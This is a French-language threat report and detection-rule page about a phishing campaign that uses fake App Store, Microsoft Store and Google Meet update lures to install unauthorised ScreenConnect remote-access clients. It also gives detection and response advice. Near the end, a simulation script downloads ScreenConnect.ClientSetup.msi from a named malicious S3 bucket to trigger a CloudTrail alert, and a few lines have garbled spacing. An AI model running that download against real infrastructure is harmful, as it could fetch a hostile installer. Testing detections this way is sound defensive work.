Propagation de ScreenConnect à grande échelle via le phishing thématique de l’App Store
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Une campagne de phishing à grande échelle utilise des techniques avancées d’ingénierie sociale pour déployer des clients ConnectWise ScreenConnect non autorisés. Les attaquants se font passer pour des services de confiance tels que le Microsoft Store, Apple App Store et Google Meet à travers des contenus web dynamiques et de fausses notifications de mise à jour. Une fois installée, le logiciel RMM donne aux acteurs malveillants un accès à distance persistant aux systèmes compromis.
Enquête
L’équipe LevelBlue OpsCTI a découvert la campagne en étudiant un cadre de phishing imitant des mises à jour et réutilisant une infrastructure. Les chercheurs ont identifié des structures de répertoires cohérentes, des empreintes de ressources HTTP récurrentes, et des scripts assistés par IA utilisés pour profiler les victimes potentielles. L’enquête a également révélé l’exploitation des API Telegram Bot pour la télémétrie en temps réel et le rapport d’infection.
Atténuation
Les organisations devraient prioriser la détection de logiciels RMM non autorisés et surveiller les téléchargements exécutables provenant de services cloud publics inconnus tels qu’Amazon S3 ou Cloudflare R2. Des contrôles pour identifier l’usurpation de marque et le trafic API Bot Telegram non autorisé sont également recommandés. Des examens réguliers de l’inventaire des postes de travail peuvent aider à découvrir des installations ScreenConnect non conformes et des compromis existants.
Réponse
Si un compromis est suspecté, les systèmes concernés doivent être immédiatement isolés et tout client ScreenConnect communiquant avec des instances de relais non autorisées doit être investigué. Les journaux réseau doivent être examinés pour détecter des connexions suspectes avec des domaines de phishing connus ou des points de stockage cloud publics. Les intervenants doivent également examiner les processus lancés par msiexec.exe ou PowerShell qui téléchargent des fichiers depuis des sources externes.
Flux d’Attaque
Détections
Possibilité d’Exécution via des Lignes de Commande PowerShell Cachées (via cmdline)
Proof of Value
Appel de Méthodes .NET Suspectes depuis PowerShell (via powershell)
Proof of Value
Msiexec Possible Exécutant des Fichiers dans un Répertoire Inhabituel (via cmdline)
Proof of Value
Logiciel de Gestion / Accès à Distance Alternatif (via process_creation)
Proof of Value
Possible Abus de Domaine de Développement Cloudflare (via dns)
Proof of Value
Commandement et Contrôle Suspect par Requête DNS de Domaine de Premier Niveau (TLD) Inhabituel (via dns)
Proof of Value
IOC (HashSha256) à détecter : Au-delà des ‘Fausses Mises à jour’ : Du Phishing Thématique Application Store à la Distribution à Grande Échelle de ScreenConnect
Proof of Value
IOC (SourceIP) à détecter : Au-delà des ‘Fausses Mises à jour’ : Du Phishing Thématique Application Store à la Distribution à Grande Échelle de ScreenConnect
Proof of Value
IOC (DestinationIP) à détecter : Au-delà des ‘Fausses Mises à jour’ : Du Phishing Thématique Application Store à la Distribution à Grande Échelle de ScreenConnect
Proof of Value
Exécution de l’Installation Non Autorisée de ScreenConnect via Phishing [Création de Processus Windows]
Proof of Value
Détecter le Téléchargement de l’Installateur ScreenConnect depuis des Buckets S3 Suspects [Traînée Cloud AWS]
Proof of Value
Exécution de Simulation
Prérequis : La Vérification de Pré-Vol pour la Télémétrie & Baseline doit avoir réussi.
Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un mauvais diagnostic.
-
Narrative d’Attaque & Commandes : Un attaquant a établi une campagne de phishing. Pour éviter la détection par des antivirus basés sur les fichiers, il héberge un outil d’accès à distance légitime (ScreenConnect) dans un bucket AWS S3 public qui imite la distribution légitime de logiciels. L’attaquant incite une victime à télécharger l’installateur. Cette action déclenche un
événement GetObject dans AWS CloudTrail, ciblant le bucket malveillant spécifiqueeobtdk.s3.us-east-2.amazonaws.comeobtdk.s3.us-east-2.amazonaws.comet le nom de fichier spécifiqueScreenConnect.ClientSetup.msi. -
Script de Test de Régression : [Note: Since we cannot interact with real malicious buckets, this script simulates the requête qui générerait l’entrée de journal si le bucket existait.]
#!/bin/bash # Script de simulation pour déclencher la règle de détection de CloudTrail # Cela imite l'appel API qu'un adversaire ferait pour télécharger l'outil echo "[+] Début de la Simulation : Téléchargement de ScreenConnect depuis un S3 Malveillant..." # Nous utilisons l'AWS CLI pour tenter une requête GET. # Même si le bucket n'existe pas, la tentative de 'requête' génère l'événement CloudTrail # dans un environnement réel où le bucket est configuré. aws s3 cp s3://eobtdk/ScreenConnect.ClientSetup.msi . --region us-east-2 echo "[+] Commande de simulation envoyée. Vérifiez CloudTrail pour les événements GetObject ciblant 'eobtdk.s3.us-east-2.amazonaws.com'." -
Commandes de Nettoyage :
# Supprimer les fichiers téléchargés pendant la simulation rm -f ScreenConnect.ClientSetup.msi